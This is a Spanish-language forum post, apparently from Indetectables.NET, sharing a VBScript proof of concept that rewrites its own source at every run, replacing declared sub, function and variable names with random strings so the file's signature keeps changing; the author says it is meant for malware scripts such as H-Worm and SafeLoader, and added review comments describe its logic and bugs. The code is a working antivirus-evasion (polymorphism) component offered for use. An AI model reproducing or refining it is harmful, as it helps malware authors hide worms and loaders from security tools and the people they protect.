He hecho una función para (poli)metamorfizar (no sé cuál es el término correcto) un script en VBS en runtime. Es una prueba de concepto: lo he probado con el propio script y funciona, pero no lo he testeado con scripts más largos (H-Worm) o complejos (SafeLoader).
' Top-level call: invokes ItsMorphinTime each time the script is run, so the
' file on disk is rewritten on every execution.
Call ItsMorphinTime
'####################################'
'=> By Blau (2016) - Indetectables.NET
'=> Function: ItsMorphinTime
'=> Description: Randomize declarations (variables, subs and functions) at runtime
' ItsMorphinTime: reads this script's own source file (WScript.ScriptFullName),
' replaces the names found in Sub/Function/Dim declarations with random strings,
' and writes the result back over the same file. No parameters, no return value.
' NOTE(review): the file is overwritten on every run, so its on-disk contents
' (and any hash of them) change after each execution. Only declared names are
' passed to Replace; string literals such as "Scripting.FileSystemObject", the
' regex patterns and the statement structure are left as they are unless they
' happen to contain a declared name as a substring.
Sub ItsMorphinTime()
Dim objMatches
Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject")
' Mode 1 = ForReading. The variable is declared as objME but used as objMe;
' VBScript identifiers are case-insensitive, so both spellings are one variable.
Dim objME: Set objMe = objFSO.OpenTextfile(WScript.ScriptFullName, 1)
' Whole script text is held in memory and edited as a plain string.
Dim sScript: sScript = objMe.ReadAll
' Case-insensitive matching, all matches returned (not just the first).
Dim objRegExp: Set objRegExp = New RegExp: objRegExp.IgnoreCase = True: objRegExp.Global = True
'=> Replace all subs & functions
' SubMatches(0) is the keyword, SubMatches(1) is the text between the keyword
' (plus one whitespace character) and the next "(".
objRegExp.Pattern = "(\bSub|\bFunction)\s(.+?)\("
If objRegExp.Test(sScript) Then
Set objMatches = objRegExp.Execute(sScript)
' Replace() is a plain substring substitution over the entire text, so every
' occurrence of the captured name is rewritten, including inside comments,
' string literals or longer identifiers. Replace() is called without a compare
' argument (binary comparison by default), unlike the case-insensitive regex.
' The loop counter i is never declared with Dim, so it is not in the renamed set.
For i = 0 To (objMatches.Count - 1): sScript = Replace(sScript, objMatches.Item(i).SubMatches(1), RandomString()): Next
End If
'=> Replace variables (starting with Dim)
' Captures the run of letters, digits, commas and spaces that follows "dim".
objRegExp.Pattern = "\bdim\s([a-zA-Z0-9, ]+)"
If objRegExp.Test(sScript) Then
Set objMatches = objRegExp.Execute(sScript)
Dim sVarSplit
For i = 0 To (objMatches.Count - 1)
sVarSplit = Split(objMatches.Item(i).SubMatches(0), ",")
' Multi-variable declarations: the inner loop starts at index 1, so element 0
' is not replaced in this branch, and the pieces are not trimmed before being
' passed to Replace(). Single-name declarations replace the whole capture.
If (UBound(sVarSplit) > 0) Then
For j = 1 To UBound(sVarSplit): sScript = Replace(sScript, sVarSplit(j), RandomString()): Next
Else: sScript = Replace(sScript, objMatches.Item(i).SubMatches(0), RandomString())
End If
Next
End If
'=> Rewrite
' Mode 2 = ForWriting: the script's own file is overwritten with the edited text.
' No Close call appears in this Sub for either the read or the write handle.
Set objMe = objFSO.OpenTextfile(WScript.ScriptFullName, 2): objMe.Write sScript
End Sub
' RandomString: returns a string of 15 to 39 random lowercase ASCII letters
' (Int(Rnd*25)+15 characters, each Chr(97..122)). Randomize is called on every
' invocation, reseeding Rnd before the characters are drawn.
' NOTE(review): alphabet and length range are fixed, so every name this routine
' produces is a long, letters-only, all-lowercase identifier.
Function RandomString(): Randomize: For i = 1 To (Int(Rnd*25)+15): RandomString = RandomString & Chr(Int(26*Rnd+97)): Next: End Function
'####################################'